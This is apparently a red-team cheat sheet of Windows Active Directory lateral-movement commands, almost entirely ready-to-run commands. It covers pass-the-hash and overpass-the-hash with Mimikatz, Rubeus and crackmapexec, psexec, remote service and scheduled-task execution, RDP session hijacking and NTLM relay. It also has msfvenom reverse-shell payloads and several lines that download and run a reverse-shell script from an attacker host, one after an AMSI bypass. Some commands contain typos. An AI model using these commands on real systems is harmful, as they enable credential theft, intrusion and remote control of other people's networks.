Run as context of other user
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
runas /netonly /user:<DOMAIN>\<USER> powershell.exe
.\rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> /dc:<DC IP> /rc4:<HASH>
mimikatz.exe sekurlsa::pth /domain:<DOMAIN> /user:<USER> /rc4:<HASH>
.\psexec_windows.exe -hashes <LM HASH>:<NTLM HASH> <DOMAIN>/<USER>@<COMPUTERNAME>
Required elevated privileges to execute commands
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme winrm <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme mssql <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme rdp <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Invoke-SMBExec -Target <COMPUTERNAME> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM HASH> -Command <COMMAND> -Verbose
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <DOMAIN>\<ADMINISTRATOR -p <PASSWORD> -i cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula -u <COMPUTERNAME>\administrator -p <PASSWORD> -i cmd.exe
.\PsExec64.exe \\<COMPUTERNAME> -accepteula
.\psexec_windows.exe <DOMAIN>/<USER>@<TARGET FQDN> -hashes :<NTLM HASH>
Over Pass the hash (OPTH) generate tokens(kerberos) from hashes or keys. Needs elevation (Run as administrator)
OPSEC TIP: Use aes256 keys!
.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Mimikatz overpass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:powershell.exe"'
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /aes256:<AES256KEYS> /run:cmd.exe" "exit"
Below doesn't need elevation
Rubeus.exe asktgt /user:<USER> /rc4:<NTLM HASH> /domain /nowrap /ptt
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain /opsec /nowrap /ptt
Below command needs elevation
Rubeus.exe asktgt /user:<USER> /aes256:<AES256KEYS> /domain /opsec /nowrap /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
Enter-PSSession -ComputerName <NAME>
$sess = New-PSSession <SERVER> -Credential <DOMAIN>\<USER>
Invoke-Command -Scriptblock {hostname; whoami;} -Session $sess
Overpass the hash mimikatz reverse shell
powercat -l -v -p 444 -t 5000
$sess = New-PSSession <SERVER>
#.ps1 is a reverse shell back to the attacker machine, make sure you run it as the user you want
$Contents = 'powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''))'; Out-File -Encoding Ascii -InputObject $Contents -FilePath reverse.bat
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:C:\reverse.bat"'
.\psexec_windows.exe <DOMAIN>/<USER>@<TARGET FQDN> -hashes :<NTLM HASH>
powershell.exe
$password = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $password)
$sess = new-pssession -credential $creds -computername <TARGET FQDN>
enter-pssession $sess
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme winrm <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme mssql <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
cme rdp <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH>
Find-LocalAdminAccess -Verbose
. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
Lateral Movement Techniques
Uses winrm / wmi
Work with the -Credential $creds
parameter.
$creds = get-credential
$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('<USERNAME>', $password)
Enter-PSSession -Computername <COMPUTERNAME>
Connect to machine and save in session variable
$sess = New-PSSession -Computername <COMPUTERNAME>
Enter-PSSession $sess
Execute commands on a machine
Invoke-Command -Computername <COMPUTERNAME> -Scriptblock {<COMMAND>}
Invoke-Command -Scriptblock {<COMMAND>} $sess
Invoke-Command -Computername <COMPUTERNAME> -FilePath <PATH>
Invoke-Command -FilePath <PATH> $sess
Run commands on multiple machines
Invoke-Command –Scriptblock {<COMMAND>} -ComputerName (Get-Content computers.txt)
Execute script on multiple machines
Invoke-Command –FilePath script.ps1 -ComputerName (Get-Content computers.txt)
Execute locally loaded function on remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content computers.txt)
Copy-Item -ToSession $sess -Path <PATH> -Destination <DEST> -verbose
Copy-Item -FromSession $sess -Path <PATH> -Destination <DEST> -verbose
PSremoting NTLM authetication (after overpass the hash)
Enter-PSSession -ComputerName <COMPUTERNAME> -Authentication NegotiateWithImplicitCredential
Get-Item WSMan:\localhost\Client\TrustedHosts
Set-Item WSMan:\localhost\Client\TrustedHosts -Value '<MACHINE OR IP>' -Concatenate
Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*'
psexec.exe -u <DOMAIN>\<USER> -p <PASSWORD> \\<TARGET> cmd.exe
python psexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Smbexec.py can be used to automate the process
sc.exe \\<TARGET> create SERVICE_NAME displayname=NAME binpath="COMMAND" start=demand
sc.exe \\<TARGET> start SERVICE_NAME
sc.exe \\<TARGET> delete SERVICE_NAME
schtasks /create /F /tn <TASKNAME> /tr COMMAND /sc once /st 23:00 /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /run /F /tn <TASKNAME> /s <TARGET> /U <USER> /P <PASSWORD>
schtasks /delete /F /tn <TASKNAME> /s <TARGET>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
Pass the hash rdp xfreerdp
xfreerdp /u:<USER> /d:<DOMAIN> /pth:<NTLM HASH> /v:<TARGET>
Invoke-Mimikatz -Command "sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm<NTLM HASH> /run:'mstsc.exe /restrictedadmin'"
If the admin mode is disabled
Enter-PSSession -Computername <TARGET>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
query user
sc.exe create rdphijack binpath="cmd.exe /c tscon <ID> /dest:<SESSION NAME>"
net start rdphijack
sc.exe delete rdphijack
Accessing RDP credentials
Complicated have to access ECPPTX again and try it out
SCShell.exe <TARGET> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\refsvr32.exe /s /n /u /i://<PAYLOAD WEBSITE>/payload.sct scrobj.ddl" . <USER> <PASSWORD>
SCShell.py
Invoke-Pbing -Target <TARGET> -Domain <DOMAIN> -User <USER> -Password <PASSWORD>
PSWA runs on port 443 on /pswa
Install Powershel web access on target
Install-WindowsFeature -Name WindowsPowerShellWebAccess
Instal-PswaWebApplication -useTestCertificate
Add-PswaAuthorizationRule -Username <USERNAME> -Computername <COMPUTER> -ConfigurationName <CONFIG NAME>
# Allow everyone (Still requires localadmin on target server)
Add-PswaAuthorizationRule -Username * -Computername * -ConfigurationName *
Go to https://<IP>/pswa
and then login using <DOMAIN>/<USER>
Crackmapexec list hosts with SMB signed disabled
crackmapexec smb <CIDR> --gen-relay-list <OUTPUT FILE>
Edit Responder config file to disable HTTP server and SMB server
ntlmrelay.py -t <TARGET> -c 'powershell.exe iex (New-Object.Net.Webclient).Downloadstring(\"http://<ATTACKER IP>/Invoke-PowerShellTcp.ps1\")"' -smb2support
responder -I <INTERFACE> -v
# Meterpreter ps1 rev shell
msfvenom -p windows/x64/meterpreter_reverse_https -f psh -o msf.ps1 lhost=<HOST> lport=<PORT> exitfunc=thread
# Meterpreter bind tcp executable
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<HOST> LPORT=<PORT> -f exe -o bind_tcp.exe
# Meterpreter reverse tcp executable
Msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<HOST> LPORT=<PORT> -f exe > shell.exe
# Bat file to run reverse powershell
msfvenom -p cmd/windows/reverse_powershell LHOST=<HOST> LPORT=<PORT> > attach.bat
powershell.exe -c "iex (New-Object Net.WebClient).DownloadString('http://<IP>/amsi.txt'); iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp2.ps1')"